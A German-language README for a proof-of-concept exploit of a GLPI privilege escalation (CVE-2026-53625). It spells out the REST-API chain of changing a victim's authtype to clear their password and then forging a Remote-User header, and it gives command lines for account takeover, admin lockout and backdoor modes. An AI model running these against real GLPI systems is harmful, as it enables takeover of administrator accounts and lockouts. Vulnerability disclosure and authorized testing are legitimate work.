
GLPI-Privilegienerweiterung durch authtype-Manipulation PoC - CVE-2026-53625. Ethischer PoC für die GLPI-Schwachstelle, der es einem Techniker ermöglicht, durch authtype-Manipulation der REST-API die vollständige Kontrolle über ein beliebiges Super-Admin-Konto zu übernehmen.
Dieses Repository stellt einen ethischen Proof-of-Concept (PoC) für CVE-2026-53625 bereit, eine Schwachstelle mit hohem Schweregrad zur Privilegieneskalation in GLPI, die alle Versionen von 0.70 bis 11.0.7 betrifft.
Ein Benutzer mit niedrigen Privilegien (Techniker) kann durch Manipulation des
authtype-Felds über die REST-API die vollständige Kontrolle über
jedes Konto übernehmen, einschließlich Super-Admin. Der Angriff verknüpft drei
Schwachstellen, um eine vollständige Kontenübernahme zu erreichen und eine
dauerhafte Hintertür zu erstellen.
Offizielles Advisory: GHSA-94rp-v9f2-5rj7
GLPI prüft die Privilegienstufe nicht, wenn ein Benutzer den Datensatz eines
anderen Benutzers über die REST-API aktualisiert. Das authtype-Feld
ist nicht geschützt, und die Änderung auf EXTERNAL führt dazu,
dass GLPI das Passwort des Opfers automatisch leert. In Kombination mit einem
fälschbaren SSO-Header (Remote-User) ermöglicht dies eine
vollständige Kontenübernahme.
POST /apirest.php/initSession)
GET /apirest.php/User)
authtype-Feld des Opfers über
PUT /apirest.php/User/{id} auf EXTERNAL (4) ändern —
GLPI leert das Passwort automatisch
(User.php:1277)
Remote-User: {victim}-HTTP-Header fälschen, um eine Sitzung
als Opfer zu erhalten — kein Passwort erforderlich
Ohne konfiguriertes SSO: Der Angriff funktioniert weiterhin als DoS — das Passwort des Opfers wird geleert und es wird ausgesperrt. Für diese Auswirkung ist kein SSO erforderlich.
Dieser PoC dient nur zu Bildungszwecken und für autorisierte Tests. Verwenden Sie ihn nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche Genehmigung haben. Der Autor und die Mitwirkenden sind nicht für Missbrauch verantwortlich.
Repository klonen:
git clone https://github.com/7h30th3r0n3/CVE-2026-53625-GLPI-PoC.git
cd CVE-2026-53625-GLPI-PoC
Abhängigkeiten: bash, curl, python3, openssl
Der PoC unterstützt zwei Angriffsmodi:
# Full takeover chain (default) — requires SSO with forgeable header:
./poc_authtype_takeover.sh --auto http://glpi.local tech P@ss
# DoS only — lock out admin, no SSO needed:
./poc_authtype_takeover.sh --lockdown --auto http://glpi.local tech P@ss
# Safe mode — prove chain on sacrificial user, zero impact on real accounts:
./poc_authtype_takeover.sh --safe --verbose http://glpi.local tech P@ss
# Full takeover + restore victim afterward:
./poc_authtype_takeover.sh --backdoor --restore --restore-pass 'NewPass!' --auto http://glpi.local tech P@ss
Führen Sie ./poc_authtype_takeover.sh --help aus, um alle Optionen zu sehen.
Schwachstelle entdeckt und PoC entwickelt von 7h30th3r0n3.